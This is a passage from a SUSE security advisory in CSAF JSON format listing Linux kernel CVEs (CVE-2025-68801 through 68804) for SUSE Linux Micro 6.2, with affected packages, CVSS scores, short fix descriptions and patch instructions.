"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
